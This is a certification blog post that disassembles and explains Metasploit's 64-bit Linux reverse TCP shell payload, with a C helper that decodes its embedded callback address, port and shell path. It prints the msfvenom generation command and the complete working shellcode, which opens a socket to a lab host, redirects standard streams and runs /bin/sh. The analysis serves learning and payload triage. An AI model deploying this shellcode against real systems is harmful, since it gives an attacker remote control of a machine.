For the 5th assignment of the SecurityTube Linux Assembly Expert certification, I needed to analyze some metasploit payloads for Linux x64.
I started by looking at the linux/x64/shell_reverse_tcp.
Instead of using msfpayload, as suggested in the course materials, I’ve used msfvenom, as msfpayload is not installed on my Kali box.
```shell
$> msfvenom -p linux/x64/shell_reverse_tcp -f elf
```
The generated payload is 74 bytes, which is much smaller than what I was able to achieve in Assignment #2, but in that assignment I also had password protection.
For some reason it was impossible to use objdump to get the disassembly of the generated ELF; it complained about corrupted ELF section headers. Still, I ran GDB and here’s the disassembled code:
```asm
0x400078 push   0x29
0x40007a pop    rax
0x40007b cdq
0x40007c push   0x2
0x40007e pop    rdi
0x40007f push   0x1
0x400081 pop    rsi
0x400082 syscall
0x400084 xchg   rdi,rax
```
This first section creates the socket for the connection through the socket() syscall (0x29, or 41 in unistd_64.h), with RDI = 2 (AF_INET), RSI = 1 (SOCK_STREAM) and RDX = 0 for the protocol. They have employed the same PUSH/POP vs MOV strategy for shellcode size reduction. Additional differences from my own implementation are the smart use of CDQ to null RDX instead of using XOR like I did: CDQ sign-extends EAX into EDX, and since RAX holds the small positive syscall number, RDX ends up as zero. Also, the use of XCHG instead of MOV to move the returned socket descriptor into RDI is very smart for lowering the shellcode size, because XCHG with RAX has a shorter encoding than the equivalent MOV.
The next section is the establishment of the actual connection through the connect() system call (0x2a, or 42 in unistd_64.h). It was interesting to see them fill the whole sockaddr structure in a single instruction: the 8-byte immediate pushed onto the stack holds sin_family, sin_port and sin_addr, RSI is pointed at it with MOV RSI,RSP, and RDX = 0x10 is the structure length. This causes the appearance of null bytes in the code, though, since the high byte of sin_family and any zero octet of the address are encoded literally.
```asm
0x400086 movabs rcx,0xf02000a5c110002
0x400090 push   rcx
0x400091 mov    rsi,rsp
0x400094 push   0x10
0x400096 pop    rdx
0x400097 push   0x2a
0x400099 pop    rax
0x40009a syscall
```
Although I have not tested, I believe the code could be further optimized at 0x400091 by using a PUSH/POP combo instead of the MOV.
```asm
0x40009c push   0x3
0x40009e pop    rsi
0x40009f dec    rsi
0x4000a2 push   0x21
0x4000a4 pop    rax
0x4000a5 syscall
0x4000a7 jne    0x40009f
```
This section is exactly like my own implementation: it’s the loop that calls the dup2() system call (0x21, or 33) with RDI = the connection socket and RSI = 2, 1, 0 in turn, redirecting STDERR, STDOUT and STDIN to the socket. The JNE works because DEC RSI sets the zero flag once RSI reaches 0 and the syscall instruction leaves the flags intact, so the loop exits after the descriptor 0 has been duplicated.
```asm
0x4000a9 push   0x3b
0x4000ab pop    rax
0x4000ac cdq
0x4000ad movabs rbx,0x68732f6e69622f
0x4000b7 push   rbx
0x4000b8 mov    rdi,rsp
0x4000bb push   rdx
0x4000bc push   rdi
0x4000bd mov    rsi,rsp
0x4000c0 syscall
```
Previous comments also apply to the last section, where the execve() system call (0x3b, or 59) is used to run ‘/bin/sh’. There is the interesting use of CDQ to null RDX (which doubles as the NULL envp pointer), the smart choice of populating RBX with the ‘/bin/sh’ string in a single MOV instruction, although it comes with a null byte that also serves as the string terminator, and the PUSH RDX / PUSH RDI pair that builds argv = {"/bin/sh", NULL} on the stack for RSI. As before, there are possible size optimizations at 0x4000b8 and 0x4000bd if a PUSH/POP combo is used instead of the MOV.
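As an added example (not code from the original post or from metasploit), the C program below decodes the two 64-bit immediates the payload loads with MOVABS, for the connect() section and the execve() section discussed above. It reconstructs the sockaddr_in that connect() receives (family, port and address, read from the bytes exactly as PUSH lays them out on the stack), recovers the path string given to execve(), and counts the null bytes each immediate introduces into the shellcode. The two immediate values come from the disassembly on this page; the function names and the static buffers are my own choices for illustration.

```c
/* Added example (not from the original post or from metasploit): decode the
 * two 64-bit immediates the payload loads with MOVABS, recovering the
 * sockaddr_in that connect() is given and the path that execve() runs, and
 * count the null bytes each immediate puts into the shellcode. Only the two
 * immediate values are taken from the disassembly; the rest is illustrative. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <arpa/inet.h>
#include <netinet/in.h>

#define SOCKADDR_IMM 0x0f02000a5c110002ULL /* movabs rcx, ... at 0x400086 */
#define PATH_IMM     0x0068732f6e69622fULL /* movabs rbx, ... at 0x4000ad */

/* Write the immediate to memory exactly as PUSH does: 8 bytes, little-endian. */
static void imm_to_bytes(uint64_t imm, uint8_t out[8]) {
    for (int i = 0; i < 8; i++)
        out[i] = (uint8_t)(imm >> (8 * i));
}

/* Count the zero bytes the immediate contributes to the shellcode; a NUL is a
 * problem whenever the shellcode has to survive a C-string copy. */
int null_bytes(uint64_t imm) {
    uint8_t b[8];
    imm_to_bytes(imm, b);
    int n = 0;
    for (int i = 0; i < 8; i++)
        if (b[i] == 0) n++;
    return n;
}

/* After PUSH RCX / MOV RSI,RSP, RSI points at the pushed bytes and connect()
 * reads them as the first 8 bytes of a struct sockaddr_in: sin_family
 * (2 bytes), sin_port (2 bytes, network order) and sin_addr (4 bytes). */
static struct sockaddr_in as_sockaddr(uint64_t imm) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    imm_to_bytes(imm, (uint8_t *)&sa); /* fills family, port and address */
    return sa;
}

uint16_t sockaddr_family(uint64_t imm) { return as_sockaddr(imm).sin_family; }

uint16_t sockaddr_port(uint64_t imm) { return ntohs(as_sockaddr(imm).sin_port); }

/* Dotted-quad form of sin_addr; returns a static buffer for convenience. */
const char *sockaddr_ip(uint64_t imm) {
    static char buf[INET_ADDRSTRLEN];
    struct sockaddr_in sa = as_sockaddr(imm);
    inet_ntop(AF_INET, &sa.sin_addr, buf, sizeof buf);
    return buf;
}

/* The pushed path bytes form a NUL-terminated C string, low byte first. */
const char *decode_path(uint64_t imm) {
    static char buf[9];
    uint8_t b[8];
    imm_to_bytes(imm, b);
    memcpy(buf, b, 8);
    buf[8] = '\0'; /* guard in case no NUL is present inside the 8 bytes */
    return buf;
}

int main(void) {
    printf("connect(): family=%u port=%u ip=%s (null bytes: %d)\n",
           (unsigned)sockaddr_family(SOCKADDR_IMM),
           (unsigned)sockaddr_port(SOCKADDR_IMM),
           sockaddr_ip(SOCKADDR_IMM), null_bytes(SOCKADDR_IMM));
    printf("execve():  path=%s (null bytes: %d)\n",
           decode_path(PATH_IMM), null_bytes(PATH_IMM));
    return 0;
}
```

Running it against the two immediates from the disassembly shows why the author sees null bytes in both sections: the sockaddr immediate carries two (the high byte of sin_family and the zero octet of the address), and the path immediate carries one, the terminator of "/bin/sh". The same decoding is what an analyst does when triaging a captured payload to learn which host and port it connects back to.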
Overall I feel proud that the published metasploit reverse tcp shell implementation is essentially very similar to mine.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification.
Student ID: SLAE64-1440